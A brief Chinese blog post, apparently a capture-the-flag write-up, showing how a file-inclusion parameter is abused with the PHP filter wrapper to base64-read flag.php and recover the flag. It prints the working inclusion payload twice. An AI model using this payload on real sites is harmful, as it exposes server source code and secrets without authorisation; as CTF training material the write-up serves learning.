本文最后更新于521 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

点击tips之后
发现可用的文件包含参数

可以使用php伪协议读取文件
?file=php://filter/read=convert.base64-encode/resource=flag.php

解码:
<?php
echo “Can you find out the flag?”;
//flag{810a49b9-8a3c-4ca7-9f5f-658cc2a5153a}
?>
总结
文件包含
php伪协议
php://filter/read=convert.base64-encode/resource=xxx.php